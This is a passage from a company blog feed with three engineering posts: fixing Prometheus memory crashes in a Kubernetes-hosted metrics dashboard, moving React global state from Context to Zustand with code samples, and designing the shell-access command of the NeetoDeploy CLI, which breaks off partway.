       <title><![CDATA[Building the metrics dashboard in NeetoDeploy with Prometheus]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/using-prometheus-in-neeto-deploy"/>
      <updated>2024-01-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-prometheus-in-neeto-deploy</id>
      <content type="html"><![CDATA[<p><em>We are building <a href="https://neeto.com/neetoDeploy">NeetoDeploy</a>, a compelling alternative to Heroku. Stay updated by following NeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a> and reading our <a href="https://www.bigbinary.com/blog/categories/neetodeploy">blog</a>.</em></p><p>One of the features that we wanted in our cloud deployment platform, <strong>NeetoDeploy</strong>, was application metrics. We decided to use <a href="https://prometheus.io/">Prometheus</a> for building this feature. Prometheus is an open source monitoring and alerting toolkit and is a CNCF graduated project. Venturing into the Cloud Native ecosystem of projects apart from Kubernetes was something we had never done before. We ended up learning a lot about Prometheus and how to use it during the course of building this feature.</p><h2>Initial setup</h2><p>We installed Prometheus in our Kubernetes cluster by writing a deployment configuration YAML and applying it to our cluster. We also provisioned an AWS Elastic Block Store volume using a PersistentVolumeClaim to store the metrics data collected by Prometheus. Prometheus needed a <a href="https://github.com/prometheus/prometheus/blob/main/documentation/examples/prometheus-kubernetes.yml">configuration file</a> where we defined all the targets it would be scraping metrics from. This is a YAML file which we stored in a ConfigMap in our cluster.</p><p>Targets in Prometheus can be anything that exposes metrics data in the Prometheus format at a <code>/metrics</code> endpoint. This can be your application servers, Kubernetes API servers or even Prometheus itself. Prometheus would scrape the data at the defined <code>scrape_interval</code> and store it in the volume as time series data. This can be queried and visualized in the Prometheus dashboard that comes bundled with the Prometheus deployment.</p><p>We used the <code>kubectl port-forward</code> command to test that Prometheus was working locally. 
Once everything was tested, we exposed Prometheus with an ingress so that we could hit its APIs with that URL.</p><p>Initially we had configured the following targets:</p><ol><li><a href="https://github.com/prometheus/node_exporter">node_exporter</a> from Prometheus, which would scrape the metrics of the machine the deployment is running on.</li><li><a href="https://github.com/kubernetes/kube-state-metrics">kube-state-metrics</a> which would listen to the Kubernetes API and store metrics of all the objects.</li><li><a href="https://traefik.io/traefik/">Traefik</a> for all the network-related metrics (like the number of requests etc.) since we are using Traefik as our ingress controller.</li><li>kubernetes-nodes</li><li>kubernetes-pods</li><li>kubernetes-cadvisor</li><li>kubernetes-service-endpoints</li></ol><p>The last 4 scrape jobs would be collecting metrics from the Kubernetes REST API related to nodes, pods, containers and services respectively.</p><p>For scraping metrics from all of these targets, we had set a resource request of 500 MB of RAM and 0.5 vCPU for our Prometheus deployment.</p><p>After setting up all of this, the Prometheus deployment was running fine, and we were able to see the data from the Prometheus dashboard. Seeing this, we were satisfied and happily started hacking with PromQL, Prometheus's query language.</p><h2>The CrashLoopBackOff crime scene</h2><p><code>CrashLoopBackOff</code> is when a Kubernetes pod goes into a loop of crashing, restarting itself and then crashing again - and this was what was happening to the Prometheus deployment we had created. From what we could see, the pod had crashed, and when it got recreated, Prometheus would initialize itself and do a reload of the <a href="https://prometheus.io/docs/prometheus/latest/storage/">Write Ahead Log (WAL)</a>.</p><p>The WAL is there for adding additional durability to the database. 
Prometheus stores the metrics it scrapes in memory before persisting them to the database as chunks, and the WAL makes sure that the in-memory data will not be lost in the case of a crash. In our case, the Prometheus deployment was crashing, and it would get recreated. It would try to load the data from the WAL into memory, and then crash again before this was completed, leading to the CrashLoopBackOff state.</p><p>We tried deleting the WAL blocks manually from the volume, even though this would incur some data loss. This was able to bring the deployment back up again since the WAL replay needn't be done. However, the deployment went into CrashLoopBackOff again after a while.</p><h2>Investigating the error</h2><p>The first approach we took was to monitor the CPU, memory, and disk usage of the deployment. The disk usage seemed to be normal. We had provisioned a 100GB volume and it wasn't anywhere near getting used up. The CPU usage also seemed normal. The memory usage, however, was suspicious.</p><p>After the pods had crashed initially, we recreated the deployment and monitored it using kubectl's <code>--watch</code> flag to follow all the pod updates. While doing this, we were able to see that the pods were going into CrashLoopBackOff because they were getting OOMKilled first. The <code>OOMKilled</code> error in Kubernetes is when a pod is terminated because it tries to use more memory than it is allotted in its resource limits. We were consistently seeing the <code>OOMKilled</code> error, so memory must be the culprit here.</p><p>We added Prometheus itself as a target in Prometheus so that we could monitor the memory usage of the Prometheus deployment. The following was the general trend of how Prometheus's memory usage was increasing over time. 
This would go on until the memory crossed the specified limit, and then the pod would go into CrashLoopBackOff.</p><p><img src="/blog_images/2024/using-prometheus-in-neeto-deploy/memory_usage.png" alt="Memory usage of the Prometheus deployment"></p><p>Now that we knew that memory was the issue, we started looking into what was causing the memory leak. After talking with some folks from the Kubernetes Slack workspace, we were asked to look at the TSDB status of the Prometheus deployment. We monitored the stats in real time and saw that the number of time series stored in the database was growing by tens of thousands each second! This lined up with the increase in the memory usage graph from earlier.</p><p><img src="/blog_images/2024/using-prometheus-in-neeto-deploy/tsdb.png" alt="Prometheus TSDB stats"></p><h2>How we fixed it</h2><p>We can calculate the memory requirement for Prometheus based on the number of targets we are scraping metrics from and the frequency at which we are scraping the data. The memory requirement of the deployment is a function of both of these parameters. In our case, this was definitely higher than what we could afford to allocate (based on the nodegroup's machine type) since we were scraping a lot of data at a scrape interval of 15 seconds, which was set in the default configuration for Prometheus.</p><p>We increased the scrape interval to 60 seconds and removed all the targets from the Prometheus configuration whose metrics we didn't need for building the dashboard. Within the targets that we were scraping from, we used the <code>metric_relabel_configs</code> option to persist in the database only those metrics which we needed and to drop everything else. 
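</p><p>As an illustrative sketch (the job name is assumed; the interval comes from the fix above), a scrape job that keeps only selected metric names might look like this:</p><pre><code class="language-yaml"># Keep only the metrics the dashboard needs; drop everything else.
scrape_configs:
  - job_name: kubernetes-cadvisor
    scrape_interval: 60s
    metric_relabel_configs:
      - source_labels: [__name__]
        regex: container_cpu_usage_seconds_total|container_memory_usage_bytes
        action: keep</code></pre><p>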
We only needed the<code>container_cpu_usage_seconds_total</code>, <code>container_memory_usage_bytes</code> and the<code>traefik_service_requests_total</code> metrics - so we configured Prometheus so thatonly these three would be stored in our database, and by extension the WAL.</p><p>We redeployed Prometheus after making these changes and the memory showed greatstability afterwards. The following is the memory usage of Prometheus over thelast few days. It has not exceeded 1GB.</p><p><img src="/blog_images/2024/using-prometheus-in-neeto-deploy/memory_usage_after_fix.png" alt="Memory usage of the Prometheus deployment after the fix"></p><h2>The aftermath</h2><p>Once Prometheus was stable we were able to build the metrics dashboard with thePrometheus API in a straightforward manner. The metrics dashboard came to usewithin a couple of days, when the staging deployment of<a href="https://neetocode.com/">NeetoCode</a> had faced a downtime. You can see thechanges in the metrics from the time when the outage had occurred</p><p><img src="/blog_images/2024/using-prometheus-in-neeto-deploy/neetocode_metrics.png" alt="NeetoCode metrics showing the downtime"></p><p>The quintessential learning that we got from this experience is to always bewary of the resources that are being used up when it comes to tasks likescraping metrics over an extended period of time. We were scraping all themetrics initially in order to explore everything, even though all the metricswere not being used. But because of this, we were able to read a lot about howPrometheus works internally, and also learn some Prometheus best practices thehard way.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without anychange. 
If you want to give NeetoDeploy a try, then please send us an email at <a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, follow NeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join our <a href="https://neetohq.slack.com/">community Slack</a> to chat with us about any Neeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Upgrading React state management with zustand]]></title>
       <author><name>Mohit Harshan</name></author>
      <link href="https://www.bigbinary.com/blog/upgrading-react-state-management-with-zustand"/>
      <updated>2024-01-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/upgrading-react-state-management-with-zustand</id>
      <content type="html"><![CDATA[<h2>From React context to zustand: A seamless transition</h2><p>Global state refers to data that needs to be accessible and shared across different parts of an application. Unlike local or component-specific state, global state is not confined to a particular component but is available throughout the entire application.</p><p>Let's dive into a real-world scenario to understand the need for a global state in a React application.</p><p>Imagine we're building a sophisticated e-commerce platform with various components, such as a product catalog, a shopping cart, and a user profile. Each of these components requires access to shared data, like the user's authentication status and the contents of their shopping cart.</p><p>In the application, the user logs in on the homepage and starts adding products to their shopping cart. As the user navigates through different sections, such as the product catalog or the user profile, we need to decide how to seamlessly share and manage the user's authentication status and the contents of the shopping cart across these disparate components. This is where the concept of a global state comes into the picture.</p><p>In the early stages of our application development, we might adopt React Context to manage this global state.</p><p>In this blog post, we'll discuss the process of upgrading from traditional React Context to Zustand, a state management library that offers simplicity, efficiency, and improved performance.</p><h2>The Pitfalls of React Context</h2><p>In our initial setup, we relied on React contexts for managing global states. However, as our application grew, we encountered performance issues and cumbersome boilerplate code. 
Let's consider a typical scenario where we need a global user state:</p><pre><code class="language-jsx">const user = {
  name: &quot;Oliver&quot;,
  age: 20,
  address: {
    city: &quot;Miami&quot;,
    state: &quot;Florida&quot;,
    country: &quot;USA&quot;,
  },
};</code></pre><p>To use this global state, we had to create a Context, wrap the child components within a provider, and use the <code>useContext</code> hook in the child components. This led to unnecessary re-renders and increased boilerplate.</p><pre><code class="language-jsx">// Create a Context
const UserContext = React.createContext();

// Wrap the parent component with the UserContext provider
const App = () =&gt; (
  &lt;UserContext.Provider value={user}&gt;
    {/* Other components that use the user Context */}
  &lt;/UserContext.Provider&gt;
);</code></pre><pre><code class="language-jsx">// In a child component, access the user Context using the `useContext` hook
const UserProfile = () =&gt; {
  const user = React.useContext(UserContext);

  return (
    &lt;div&gt;
      &lt;p&gt;{user.name}&lt;/p&gt;
      &lt;p&gt;{user.age}&lt;/p&gt;
    &lt;/div&gt;
  );
};</code></pre><p>Components that listen to the Context will trigger a re-render whenever any value within the Context changes, even if those changes are unrelated to the specific component.</p><p>For example, in the <code>UserProfile</code> component, if the value of <code>city</code> changes in the Context, the component will re-render, even if the address values aren't actually utilized within <code>UserProfile</code>. This can have a noticeable impact on performance. Furthermore, the usage of Context involves a lot of boilerplate code.</p><h2>Enter Zustand: A Breath of Fresh Air</h2><p>Zustand emerged as our solution to these challenges. It offered a more streamlined approach to global state management, addressing the performance concerns.</p><p>The <code>useUserStore</code> hook is created using zustand's <code>create</code> function. 
It initializes a store with initial state values and actions to update the state.</p><pre><code class="language-jsx">import create from &quot;zustand&quot;;

// Create a user store using zustand
const useUserStore = create(set =&gt; ({
  user: {
    name: &quot;Oliver&quot;,
    age: 20,
    address: {
      city: &quot;Miami&quot;,
      state: &quot;Florida&quot;,
      country: &quot;USA&quot;,
    },
  },
  setUser: set,
}));</code></pre><p>The <code>UserProfile</code> component uses the <code>useUserStore</code> hook to access the user state. The <code>store =&gt; store.user</code> function is passed as an argument to the hook, which retrieves the user object from the store.</p><pre><code class="language-jsx">// Access the user via the useUserStore hook
const UserProfile = () =&gt; {
  const user = useUserStore(store =&gt; store.user);

  return (
    &lt;div&gt;
      &lt;p&gt;{user.name}&lt;/p&gt;
      &lt;p&gt;{user.age}&lt;/p&gt;
    &lt;/div&gt;
  );
};</code></pre><p>In this component, <code>useUserStore</code> is used to access the entire user object from the store. Any change in the user object, even if it's a nested property like <code>age</code>, will trigger a re-render of the <code>UserProfile</code> component. This behavior is similar to how React Contexts work.</p><p>The first argument to the <code>useUserStore</code> hook is a selector function. Using the selector function, we can specify what to pick from the store. Zustand compares the previous and current values of the selected data, and if they are different, zustand triggers a re-render.</p><p>In the above example, <code>store =&gt; store.user</code> is the selector function. Zustand will compare the previous value of <code>user</code> with the current value and will trigger a re-render if the values are different. 
But inside this component, we need only the <code>name</code> and <code>age</code> properties of the <code>user</code> object.</p><p>This is where Zustand's ability to selectively pick specific parts of the state for a component comes into play, offering potential performance optimizations.</p><p>If we want to construct a single object with multiple state-picks inside, we can use the <code>shallow</code> function to prevent unnecessary re-renders.</p><p>For example, we can be more specific by picking only the <code>name</code> and <code>age</code> values from the user store:</p><pre><code class="language-jsx">import { shallow } from &quot;zustand/shallow&quot;;

const { name, age } = useUserStore(
  ({ user }) =&gt; ({ name: user.name, age: user.age }),
  shallow
);</code></pre><p>Without <code>shallow</code>, the function <code>({ user }) =&gt; ({ name: user.name, age: user.age })</code> recreates the object <code>{ name: user.name, age: user.age }</code> every time it is called.</p><p><code>shallow</code> is a comparison function that checks for equality at the top level of the object, without performing a deep comparison of nested properties. Zustand's default behavior is to use <code>Object.is</code> to compare the current and previous values. Even though the current and previous objects can have the same properties with equal values, they are not considered equal when compared using the strict equality check ( <code>Object.is</code> ); the same goes for arrays. With <code>shallow</code>, zustand digs into the object (or array) and compares its key values (or elements), and triggers a re-render only if any one of them is different.</p><p>In the above case, <code>shallow</code> ensures that the <code>UserProfile</code> component will re-render only if the <code>name</code> or <code>age</code> properties of the user object change.</p><p>Zustand also provides the <code>getState</code> function as a way to directly access the state of a store. 
This function can be particularly useful when we want to access the state outside of the component rendering cycle.</p><p>When using a value within a specific function, <code>getState()</code> retrieves the latest value at the time of calling. It is useful to avoid loading the value via the hook (which would trigger a re-render when the value changes).</p><pre><code class="language-jsx">const useUserStore = create(() =&gt; ({ name: &quot;Oliver&quot;, age: 20 }));

// Getting non-reactive fresh state
const handleUpdate = () =&gt; {
  if (useUserStore.getState().age === 20) {
    // Our code here
  }
};</code></pre><h2>Working with Zustand</h2><h3>1. Installing zustand</h3><pre><code class="language-bash">yarn add zustand</code></pre><h3>2. Replacing all contexts with zustand</h3><p>During the initial migration, we replaced all React contexts with Zustand. This involved copying data and replacing Context hooks with Zustand stores. Our focus was on the migration itself, deferring performance enhancements for a later phase.</p><p>In the context of Zustand, &quot;actions&quot; refer to functions that are responsible for updating the state. In other words, actions are methods that modify the data within the state container.</p><pre><code class="language-jsx">const useUserStore = create(
  withImmutableActions(set =&gt; ({
    name: &quot;Oliver&quot;,
    age: 20,
    address: {
      city: &quot;Miami&quot;,
      state: &quot;Florida&quot;,
      country: &quot;USA&quot;,
    },
    setName: ({ name }) =&gt; set({ name }),
    setGlobalState: set,
  }))
);</code></pre><p>In the provided code snippet, <code>setName</code> and <code>setGlobalState</code> are examples of actions. 
Let's break it down:</p><p><code>setName</code>: This action takes an object as an argument, specifically <code>{ name }</code>, and updates the <code>name</code> property of the state with the provided value.</p><pre><code class="language-jsx">setName: ({ name }) =&gt; set({ name }),</code></pre><p><code>setGlobalState</code>: Similarly, this action takes an argument, and in this case, it merges the state with the provided argument. It's a more generic action that allows modifying multiple properties of the state at once.</p><p>To safeguard against actions being overwritten, we introduced a middleware function called <code>withImmutableActions</code>.</p><p>This middleware ensures that attempts to overwrite Zustand store actions result in an error, providing a safeguard against unintended behavior.</p><p>In the example below, <code>withImmutableActions</code> throws an error because we are trying to overwrite the Zustand store's actions.</p><pre><code class="language-jsx">// throws an error
setGlobalState({ name: 0, setName: () =&gt; {} });</code></pre><p>Here is the source code of <code>withImmutableActions</code>:</p><pre><code class="language-js">import { isEmpty, keys } from &quot;ramda&quot;;

const setWithoutModifyingActions = set =&gt; partial =&gt;
  set(previous =&gt; {
    if (typeof partial === &quot;function&quot;) partial = partial(previous);

    const overwrittenActions = keys(partial).filter(
      key =&gt;
        typeof previous?.[key] === &quot;function&quot; &amp;&amp; partial[key] !== previous[key]
    );

    if (!isEmpty(overwrittenActions)) {
      throw new Error(
        `Actions should not be modified. 
Touched action(s): ${overwrittenActions.join(&quot;, &quot;)}`
      );
    }

    return partial;
  }, false);

const withImmutableActions = config =&gt; (set, get, api) =&gt;
  config(setWithoutModifyingActions(set), get, api);</code></pre><p>Unlike Zustand's default behavior, this middleware disregards the <a href="https://github.com/pmndrs/zustand#overwriting-state">second argument of the <code>set</code> function</a>, which is used to overwrite the entire state when set to <code>true</code>. Hence, the following lines of code work identically to each other:</p><pre><code class="language-jsx">setGlobalState({ value: 0 }, true);
setGlobalState({ value: 0 });</code></pre><h3>3. Performance optimization strategies</h3><p>We identified key strategies to optimize performance while using Zustand:</p><h4>Selective Data Usage</h4><p>Instead of using the entire state, components can selectively choose the data they need. This ensures that re-renders occur only when relevant data changes.</p><p>Consider the following user store:</p><pre><code class="language-jsx">const useUserStore = create(set =&gt; ({
  name: &quot;&quot;,
  subjects: [],
  address: {
    city: &quot;&quot;,
    country: &quot;&quot;,
  },
  setUser: set,
}));</code></pre><p>If we only need the city value, we can do:</p><pre><code class="language-jsx">const city = useUserStore(store =&gt; store.address.city);</code></pre><p>In this case, the usage of <code>shallow</code> is not necessary because the selected data is a primitive value (<code>city</code>), not a complex object with nested properties. <code>shallow</code> is not needed when the returned value can be compared using <code>Object.is</code>.</p><h4>Avoiding importing values like contexts</h4><pre><code class="language-jsx">// Not recommended
const {
  address: { city, country },
  setAddress,
} = useUserStore();</code></pre><p>We can replace the above code with the following approach:</p><pre><code class="language-jsx">const { city, country }
= useUserStore(
  store =&gt; pick([&quot;city&quot;, &quot;country&quot;], store.address),
  shallow
);

const setAddress = useUserStore(prop(&quot;setAddress&quot;));

// `pick` and `prop` are imported from ramda</code></pre><h4>Avoiding prop drilling</h4><p>Directly accessing Zustand values within the intended component eliminates the need for prop drilling, improving code clarity and maintainability.</p><h4>Utilizing the <code>getState</code> Method</h4><p>When used within a function, <code>getState()</code> retrieves the latest value at the time of calling the function. It is useful to avoid having the value loaded using the hook (which will trigger a re-render when this value changes).</p><pre><code class="language-jsx">const handleUpdate = () =&gt; {
  if (useUserStore.getState().role === &quot;admin&quot;) {
    // Our code here
  }
};</code></pre><h2>Challenges and Solutions</h2><h3>Shared State Instances Across Components</h3><p>Zustand's design maintains a single instance of state and actions. When using the same store hook across multiple components, values are shared. To address this, we combined Zustand with React Context, achieving a balance between efficient state management and isolation.</p><p>When we call the store hook (<code>useUserStore</code>) from different components which need separate states, the values returned by the hook will be the same across those components.</p><p>This behavior is a consequence of Zustand's design. It maintains a single instance of the state and actions, ensuring that all components using the same hook share the same state and actions.</p><p>To illustrate this, consider an example where we have two input components on a form page: one for the Student profile and another for the Teacher profile. 
Both components are utilizing the same <code>useUserStore</code> to manage both student and teacher details.</p><pre><code class="language-jsx">// useUserStore.js
import { create } from &quot;zustand&quot;;

const useUserStore = create(set =&gt; ({
  name: &quot;&quot;,
  subjects: [],
  address: {
    city: &quot;&quot;,
    country: &quot;&quot;,
  },
  setName: name =&gt; set({ name }),
  setUser: set,
}));

export default useUserStore;

// App.jsx
import React from &quot;react&quot;;

import Profile from &quot;./Profile&quot;;

const App = () =&gt; (
  &lt;div&gt;
    &lt;Profile role=&quot;Teacher&quot; /&gt;
    &lt;Profile role=&quot;Student&quot; /&gt;
  &lt;/div&gt;
);

export default App;

// Profile.jsx
import React from &quot;react&quot;;
import { prop } from &quot;ramda&quot;;

import useUserStore from &quot;./stores/useUserStore&quot;;

const Profile = ({ role }) =&gt; {
  const name = useUserStore(prop(&quot;name&quot;));
  const setName = useUserStore(prop(&quot;setName&quot;));

  return (
    &lt;div&gt;
      &lt;p&gt;{`Enter the ${role}'s name`}&lt;/p&gt;
      &lt;input value={name} onChange={e =&gt; setName(e.target.value)} /&gt;
    &lt;/div&gt;
  );
};

export default Profile;</code></pre><p>In this setup, since both the Student and Teacher profiles are using the same store (<code>useUserStore</code>), the input fields in both components will display the same value.</p><p><img src="/blog_images/2024/upgrading-react-state-management-with-zustand/multiple_components_using_same_store.gif" alt="Multiple components using same store"></p><p>We combined Zustand with React Context to address this challenge of shared state instances across different components on the same page. 
By doing so, we have achieved a balance between the benefits of Zustand's efficient state management and the isolation provided by React Context.</p><pre><code class="language-jsx">// Create a Context
import { createContext } from &quot;react&quot;;

const UserContext = createContext(null);

export default UserContext;

// Modify useUserStore using createStore
import { createStore } from &quot;zustand&quot;;

const useUserStore = () =&gt;
  createStore(set =&gt; ({
    name: &quot;&quot;,
    subjects: [],
    address: {
      city: &quot;&quot;,
      country: &quot;&quot;,
    },
    setName: name =&gt; set({ name }),
    setUser: set,
  }));

export default useUserStore;

// Add changes to Profile.jsx
import React, { useContext, useMemo } from &quot;react&quot;;
import { pick } from &quot;ramda&quot;;
import { useStore } from &quot;zustand&quot;;
import { shallow } from &quot;zustand/shallow&quot;;

import useUserStore from &quot;./stores/useUserStore&quot;;
import UserContext from &quot;./contexts/User&quot;;

const Profile = ({ role }) =&gt; {
  const userStore = useContext(UserContext);
  const { name, setName } = useStore(
    userStore,
    pick([&quot;name&quot;, &quot;setName&quot;]),
    shallow
  );

  return (
    &lt;div&gt;
      &lt;p&gt;{`Enter the ${role}'s name`}&lt;/p&gt;
      &lt;input value={name} onChange={e =&gt; setName(e.target.value)} /&gt;
    &lt;/div&gt;
  );
};

const ProfileWithState = props =&gt; {
  const stateStore = useMemo(useUserStore, []);

  return (
    &lt;UserContext.Provider value={stateStore}&gt;
      &lt;Profile {...props} /&gt;
    &lt;/UserContext.Provider&gt;
  );
};

export default ProfileWithState;</code></pre><p>With this implementation, each component gets its own isolated state, avoiding the issue of shared state instances.</p><p><img src="/blog_images/2024/upgrading-react-state-management-with-zustand/multiple_components_using_same_store_with_context.gif" alt="Multiple components using same store with context"></p><h3>Tackling Boilerplate Code</h3><p>In the codebase, there was a recurring pattern of 
boilerplate code when trying to pick specific properties from a Zustand store with nested values. This involved using <code>shallow</code> and manually accessing nested properties, resulting in verbose code.</p><p>To simplify this process and reduce boilerplate, a <a href="https://github.com/bigbinary/babel-preset-neeto/blob/main/docs/zustand-pick.md">custom babel plugin</a> was developed. This plugin provides a cleaner syntax for picking properties from Zustand stores.</p><p>Without the plugin, to pick specific values from the store, we needed to write:</p><pre><code class="language-jsx">// Before
import { shallow } from &quot;zustand/shallow&quot;;

const { order, customer } = useGlobalStore(
  store =&gt; ({
    order: store[sessionId]?.globals.order,
    customer: store[sessionId]?.globals.customer,
  }),
  shallow
);</code></pre><p>With the babel plugin, the above code can be written as:</p><pre><code class="language-jsx">// After
const { order, customer } = useGlobalStore.pick([sessionId, &quot;globals&quot;]);</code></pre><p>The babel transformer will transform this code to the one shown above to achieve the same result.</p><p>A transformer is a module with a specific goal that is run against our code to transform it. The babel plugin operates during the code compilation process. By using the plugin, developers can achieve the same functionality with fewer lines of code, reducing code verbosity.</p><p>The <code>useGlobalStore.pick</code> syntax provides a more streamlined and expressive way of picking properties. It abstracts away the need for manual property access and the use of <code>shallow</code>.</p><h2>Conclusion</h2><p>Upgrading to Zustand has proven to be a wise decision, addressing performance concerns and streamlining our state management. By combining Zustand with React Context and tackling challenges with innovative solutions, we've achieved a robust and efficient state management system in our React applications.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Building NeetoDeploy CLI]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/building-neeto-deploy-cli"/>
      <updated>2023-12-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/building-neeto-deploy-cli</id>
      <content type="html"><![CDATA[<p><em>We are building <a href="https://neeto.com/neetoDeploy">NeetoDeploy</a>, a compelling Heroku alternative. Stay updated by following NeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a> and reading our <a href="https://www.bigbinary.com/blog/categories/neetodeploy">blog</a>.</em></p><p>Building the CLI tool for <a href="https://neetodeploy.com">NeetoDeploy</a> became our top priority after we had built all the basic features in NeetoDeploy. Once we started migrating our apps from Heroku to NeetoDeploy, the need for a CLI tool arose, since previously developers were using the Heroku CLI for their scripts etc.</p><p>We started building the CLI as a Ruby gem using <a href="http://whatisthor.com/">Thor</a>. Installing the gem and using it would be as simple as running <code>gem install neetodeploy</code>. We wanted the users to be authenticated via Neeto's authentication system before they could do anything else with the CLI. For this, we added a <code>neetodeploy login</code> command, which would create a session and redirect you to the browser where you can log in. The CLI would be polling the session login status, and once you have logged in, it would store the session token and your email address inside the <code>~/.config/neetodeploy</code> directory. This will be used to authenticate your requests when you run every other command.</p><h3>The basic CLI functionality</h3><p>The v1 release of the NeetoDeploy CLI shipped the following commands:</p><ul><li><code>config</code>: For listing, creating, and deleting environment variables for your apps.</li><li><code>exec</code>: For getting access to a shell running inside your deployed app.</li><li><code>logs</code>: For streaming the application logs right to your terminal.</li></ul><p>Let's look at each of them in detail.</p><h3>Setting environment vars</h3><p>Building the <code>config</code> command was the most straightforward of the three. 
The central source of truth for all the environment variables of the apps is stored in the web dashboard of NeetoDeploy. There are APIs already in place for doing CRUD operations on these from the dashboard app. These could be expanded for use by the CLI as well.</p><p>We first added API endpoints in the dashboard app, under a CLI namespace, to list, create, and delete config variables. We then added different commands in the CLI to send HTTP requests to the respective endpoints in the dashboard app.</p><p><img src="/blog_images/2023/building-neeto-deploy-cli/cli-demo.gif" alt="The NeetoDeploy config command in action"></p><p>You can pass the app name as an argument, and the CLI will send a request to the dashboard app along with the session token generated when you logged in. At the backend, this session token would be used to check if you have access to the app you're requesting, before doing anything else.</p><p>If you have used the Heroku CLI, then you would be very comfortable, since the NeetoDeploy CLI follows the same style.</p><h3>Architecting the <code>neetodeploy exec</code> command</h3><p>The <code>exec</code> command is used to get access to a shell inside your deployed app. The NeetoDeploy web dashboard already has a functioning console feature with which you can get access to the shell inside your application's dynos. This was built using websockets. We would deploy a &quot;console&quot; pod with the same image and environment variables as the app, to which we'll connect with websockets. We have a dyno-console-manager app which spawns a new process inside the console dyno and handles the websocket connections, etc. When we started building the exec feature for the CLI, however, we explored a few options and learnt a lot of things before finally settling back on the websockets approach.</p><p>We've been using the <code>kubectl exec</code> command on a daily basis to get access to shells inside pods running in the cluster. 
Since <code>kubectl exec</code> is cosmetically similar to how we use SSH to access remote machines, the first approach we took involved using SSH to expose containers outside the cluster.</p><p>We can expose our deployment outside the cluster using SSH in two ways. The first approach would be running an SSH server as a <a href="https://www.google.com/search?q=kubernetes+sidecar+container+pattern">sidecar container</a> within the console pod. The second approach would be to bundle <a href="https://man7.org/linux/man-pages/man8/sshd.8.html">sshd</a> within the image for the console pod using a custom buildpack. With either of these two methods, you would be able to SSH into your console deployment if you have the correct SSH keys. We ran <code>sshd</code> inside a pod using a <a href="https://github.com/jkutner/sshd-buildpack">custom sshd buildpack</a>. We then configured the SSH public key inside the pod manually with <code>kubectl exec</code>. With this, we were able to SSH into the pod after port forwarding the sshd process's port to localhost using <code>kubectl port-forward</code>.</p><p>Great! Now that the SSH connection works, the part of the puzzle that remained was how we would actually expose the deployment outside the cluster in production. We tried doing this in a couple of different ways.</p><h4>1. LoadBalancer</h4><p>We were able to SSH into the pod after exposing it as a <a href="https://kubernetes.io/docs/tasks/access-application-cluster/create-external-load-balancer">LoadBalancer</a> service. This was out of the question for production, however, since AWS has a hard limit on the number of application load balancers (ALB) we can create per region. We'd also have to pay for each load balancer we create. This approach wouldn't scale at all.</p><h4>2. NodePort</h4><p>The next option was to expose the pod as a <code>NodePort</code> service. 
A NodePort service in Kubernetes means that the pod would be exposed through a certain port number on <em>every node</em> in the cluster. We could SSH into the pod with the external IP of any of the nodes. We tried exposing the test console pod we created with a NodePort service as well. We were able to SSH into the pod from outside the cluster without having to do the port forward. There was one limitation of using NodePorts that we knew would render this method suboptimal for building a Platform as a Service. The range of ports that can be allocated for NodePort services is from 30000 to 32767 by default. This means that we'd only be able to run 2768 instances of <code>neetodeploy exec</code> at any given time in our current cluster setup in EKS.</p><h4>3. Bastion host, the SSH proxy server</h4><p>We thought of deploying an SSH proxy server to circumvent the hard limits of the LoadBalancer and NodePort approaches. Such proxy servers are usually called bastion hosts or jump servers. These are servers that are designed to provide access to a private network from a public network. The name &quot;bastion&quot; comes from the military structure that projects outwards from a castle or a fort. In a similar sense, our bastion host would be a Kubernetes deployment that is exposed to the public network and acts as an interface between our private cluster and the public internet. For our requirement, we can proxy SSH connections to console pods through this bastion host deployment. We only needed to expose the bastion host as a single LoadBalancer or NodePort service, to which the CLI can connect. This would solve the issue of having a hard limit on the number of LoadBalancer or NodePort services we can create.</p><p><img src="/blog_images/2023/building-neeto-deploy-cli/bastion-host.png" alt="The bastion host architecture for exposing deployments"></p><p>We quickly set up a bastion host and tested the whole idea. It was working seamlessly! 
However, there were a lot of edge cases we'd have to handle if we were going to release this to the public. Ideally, we would want a new pair of SSH keys for each console pod. We could generate these and store them as secrets in the cluster. Apart from the hassle of handling all the SSH keys and updating the bastion host each time, we would have to make sure that users would not be able to get SSH access to the bastion host deployment manually, outside the CLI. This was difficult, since the CLI would need access to the private key in order to connect to the bastion host anyway. This would mean that users could SSH into the bastion host after digging through the CLI gem's source, and possibly even exec into any deployment in the cluster if they knew what they were looking for. Users with malicious intent could possibly bring down the bastion host itself once they're inside, rendering the exec command unusable.</p><p>We thought about installing kubectl inside the bastion host with a restrictive <a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/">RBAC</a> so that we can run <code>kubectl exec</code> from inside the bastion host, while also making sure that users could not run anything destructive from inside it. But this just adds more moving parts to the system. The SSH proxy approach makes sense if you have to expose your cluster to developers for internal use, but it is not ideal when you are building a CLI for public use.</p><p>After figuring out <em>how not to solve the problem</em>, we came to the conclusion that using websockets was the better approach for now. We already had the dyno-console-manager app, which we were using for shell access from the web dashboard, so we updated it to handle connections from the CLI as well. From the CLI's end, we wrote a simple WebSocket client and handled the parsing of user inputs and printing the responses from the shell. 
